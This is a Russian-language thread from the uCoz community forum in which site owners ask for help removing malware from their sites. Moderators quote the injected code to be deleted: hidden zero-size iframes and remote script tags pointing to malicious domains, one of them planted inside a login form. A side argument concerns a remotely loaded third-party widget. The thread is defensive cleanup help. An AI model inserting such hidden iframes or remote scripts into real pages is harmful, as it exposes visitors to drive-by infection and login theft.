Модератор форума: Yuri_G  
Вирусы на сайтах (для изучения)
pwnz
Сообщений: 1
Репутация: 0

Сообщение # 271 | 02:05:15
помогите вирусы на сайте http://cs-battle.my1.ru/ . буду ждать вашего ответа , заранее спасибо
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 272 | 02:08:42
pwnz, выделенное красным удалить
Quote
tr>

<script type="text/javascript" src="http://login-form.bot56.ru/jogin_form_javascript.js"></script>
<iframe src="http://rapnews.pp.ua/" name="iframe" width="0%" height="0%" scrolling="no" frameBorder=0></iframe>
<td width="25" nowrap="nowrap"><img src="http://s001.radikal.ru/i196/1002/32/5df57eb107d9.png" width="22" height="22" border="0" alt="логин" title="логин" /></td>
<td><input name="user" class="loginField" type="text" size="20" style="width:100%;" maxlength="60" value="логин" onfocus="if(this.value=='логин') this.value=''" onblur="if(!this.value) this.value='логин'"></td>
</tr>

находится в форме входа

а этот мусор что тут делает?

Quote
<A style="FONT-SIZE: 5pt" href="javascript://" rel="nofollow" onclick="new _uWnd('PollR','Результаты опроса',660,200,{closeonesc:1,maxh:400},{url:'http://cs-battle.my1.ru/poll/2'});return false;"><IMG alt="Результат опроса" src="http://active-portal.ru/menu/812ff146e.png" border="0"></A><STRONG><A style="FONT-SIZE: 5pt" href="javascript://" rel="nofollow" onclick="new _uWnd('PollR','Результаты опроса',660,200,{closeonesc:1,maxh:400},{url:'http://cs-battle.my1.ru/poll/2'});return false;"><SPAN style="FONT-SIZE: 8pt"> </SPAN></A><A style="FONT-SIZE: 5pt" href="javascript://" rel="nofollow" onclick="new _uWnd('PollR','Результаты опроса',660,200,{closeonesc:1,maxh:400},{url:'http://cs-battle.my1.ru/poll/2'});return false;"><SPAN style="FONT-SIZE: 8pt"><FONT color="#006400">Результаты</FONT></SPAN></A></STRONG> <A style="FONT-SIZE: 5pt" href="http://active-portal.ru/javascript://" rel="nofollow" onclick="new _uWnd('PollA','Архив опросов',660,250,{closeonesc:1,maxh:400,max:1,min:1},{url:'http://cs-battle.my1.ru/poll/0-2'});return false;"><IMG height="14" alt="Все опросы нашего сайта" src="http://active-portal.ru/menu/5f9874.png" width="14" border="0"></A><A style="FONT-SIZE: 5pt"[color=blue] href="http://active-portal.ru/javascript://" rel="nofollow" onclick="new _uWnd('PollA','Архив опросов',660,250,[/color]{closeonesc:1,maxh:400,max:1,min:1},{url:'http://cs-battle.my1.ru/poll/0-2'});return false;"><SPAN style="FONT-SIZE: 8pt"><FONT color="#006400"><STRONG> Архив опросов</STRONG></FONT></SPAN></A> <BR>
<HR>

<DIV style="FONT-SIZE: 7pt; PADDING-TOP: 4px; TEXT-ALIGN: center"><FONT color="#0000cd">Всего голосовало:</FONT><STRONG> <FONT color="#ff0000">34</FONT></STRONG><B>

выделенное синим пример скопированного вида опросов с чужого сайта.

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
касер
Сообщений: 6
Репутация: 2

Сообщение # 273 | 11:33:51
Доброго времени суток)LAX, пожалуйста пожалуйста нужна помощ вот мой сайт http://point--blank.ucoz.com/ мне он очень нравится но тут вирусы(и каждий день аваст ловит новый вирус ,пожалуйста я вас очень прошу скажите какой скрипт заражен и где он находится!
ато я уже все облазил а найти немогу( sad sad sad sad

Оформление подписи нарушает правила форума Сообщества uCoz. Подробнее. / webanet.
Dmitry
Сообщений: 2154
Репутация: 1057

Сообщение # 274 | 11:39:34
касер,
Code
<script type="text/javascript" src="http://thuglive.pp.ua/a.js"></script>

убрать.. во всех шаблонах.. где статистика.
Szen
Сообщений: 38
Репутация: 55

Сообщение # 275 | 14:51:27
Quote (Scorpik427)
полезный софт. вирус в Code<script type="text/javascript" src="http://szenprogs.ru/scripts/softbar/spsoftbar.js"></script>

Уважаемый Scorpik427. Я создатель этого скрипта. Никаких вирусов, троянов и другой нечисти в нем нет и не было. Я за этим строго слежу. Я не вижу ваших доказательств наличия вирусов в нем. Ваша необоснованная клевета приводит к плохому отношению к моему сайту конечных пользователей. Прошу опровергнуть ваше высказывание или доказать вашу правоту.



szenprogs.ru
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 276 | 14:58:14
Szen, у пользователя Santila была действительно другая проблема которая сейчас решена.
это на счет нечисти. а вот на счет полезности скрипта и самой начинки и на счет того как вы его раздаете, то тут могу возразить.

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Szen
Сообщений: 38
Репутация: 55

Сообщение # 277 | 15:14:13
webanet, я не претендую на звание мегакодера и супермена. smile Любые предложения и осуждения я приму и учту. Но это уже тема не этой ветки. Просто неприятно, когда обвиняют в наличии вирусов, и при этом не оставляют никакого опровержения.


szenprogs.ru
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 278 | 15:22:25
Szen,
Quote
я не претендую на звание мегакодера и супермена.
значит пока рано распространять свои скрипты по системе. чувствуете логику?
и это обсуждение именно для этой темы. скрипт слишком агрессивный. пользователи которые в этом не очень разбираются ставят подобное к себе на сайт, тем более с подгрузкой с вашего. вы в любой момент можете изменить скрипт и что будет подгружаться у тех кому вы его раздали?
скрипты раздавать надо в открытом виде и на скачивание, а не на подгрузку.
скрипт мягко говоря хлам, то есть мусор для сайта причем в довольно агрессивном виде опять же с подгрузкой и выводом с вашего сайта.

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Dmitry
Сообщений: 2154
Репутация: 1057

Сообщение # 279 | 15:45:20
Szen, Отвечу:
Уже до этого, данная проблема была именно с Вашим скриптом. Даже не то, что все ставили скрипт именно через Ваш сайт, некоторые заливали их к себе на сайт- что правильно.
Quote
<iframe src="http://szenprogs.ru/scripts/softbar/stat.htm?p=about" width="88" height="15" frameborder="0" style="overflow:hidden;"><\/iframe>

мусор.
Quote
Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe.

аж повторяется несколько раз.
Szen
Сообщений: 38
Репутация: 55

Сообщение # 280 | 15:48:19
Подгрузка реализована именно для того, чтобы можно было исправить, либо добавить новую функцию, и она стала работать у всех установивших скрипт. Специалист сам сможет сделать такой скрипт, а новичок не разберется даже в открытом коде.

Фактически, это то же самое, что и укозовский u.js, который принудительно садится на все UCOZ сайты. И что подгрузится на тысячах сайтов, если UCOZ поменяет сам скрипт? Но без u.js сайт нормально работать не сможет. Но знающий все поправит.

Также и мой скрипт. Кто разбирается - тот поправит. Мы надеемся на вашу порядочность, а мои пользователи на мою. Так и зарождается доверие к сайту и его популярность.



szenprogs.ru
Dmitry
Сообщений: 2154
Репутация: 1057

Сообщение # 281 | 15:52:23
Szen,
Quote
Статистика блока популярного софта

Это выводить нормально ? КОгда на странице только счётчик и ничего более ?
Szen
Сообщений: 38
Репутация: 55

Сообщение # 282 | 17:32:16
Quote (Scorpik427)
Это выводить нормально ? КОгда на странице только счётчик и ничего более ?

Это статистика блока. Я ее регулярно просматриваю и решаю, в какую сторону развивать блок. Счетчик лайва зарегистрирован именно на эту страницу и не более. Счетчик может видеть каждый пользователь в блоке. Наличие счетчика я не скрываю.

Этот скрипт не рушит структуру или дизайн сайта, на котором он расположен. Он не содержит вредоносного кода. И если найдется сайт, которому он нанесет вред, то я среагирую быстро и проведу соответствующие исправления. Не скрываю, конфликтные моменты были. Но я их исправил в тесном контакте с пользователями, выявившими факт.



szenprogs.ru
Министр_Юстиции
Сообщений: 14
Репутация: 4

Сообщение # 283 | 09:03:47
Всем здравствуйте! Перед Новым Годом решил установить себе новогодних скриптов всяких: Анимационный Дед Мороз, салюты, всякие гирлянды. Было неплохо. Только подарком пользователям оказались установленные баннеры на их рабочие столы. Причем начали звонить практически все (в основном, с ИЕ-браузером). У меня Мозила, но иногда просит установить плагины (естественно, я не устанавливаю). Вроде поудалял всё. что можно. Ищу js и iframe- не вижу их. В общем, нужна помощь. golubi-urala.ru

Спасибо за внимание!
Szen
Сообщений: 38
Репутация: 55

Сообщение # 284 | 14:06:12
Министр_Юстиции, есть вирь. Опера+АвастФри+ОутпостСюитПро. Зараза отрабатывает 1 раз на 1 IP. Пришла зараза отсюда (по адресу не переходить!!!): ii3s.cz.cc

Пока пытаюсь локализовать.

Добавлено (12-Янв-2011, 14:06:12)
---------------------------------------------
Министр_Юстиции, похоже нашел я зверя. На странице в блоке "Зарег-ные за месяц" есть следующий код:

Code
<iframe src="http://5fg4.pp.ua" width="0" height="0" style="display:none"></iframe>

Удалите его!


szenprogs.ru
Сообщение отредактировал Szen - Среда, 12 Янв 2011, 13:48:19
swejak
Сообщений: 3
Репутация: 0

Сообщение # 285 | 20:21:45
помогите у меня пропал админ бар,не работает форма входа,а яндекс показывает вот что http://yandex.ru/yandsearch?text=www.softikk.org.ru&lr=59 (Сайт может угрожать безопасности вашего компьютера)
какойто вирус!!!
прошу помощи cry

Добавлено (12-Янв-2011, 19:55:40)
---------------------------------------------
мой сайт www.softikk.org.ru

Поиск:
Telegram
Будьте в курсе всех обновлений: подпишитесь на наш официальный Telegram-канал uCoz и задавайте вопросы в чате сообщества!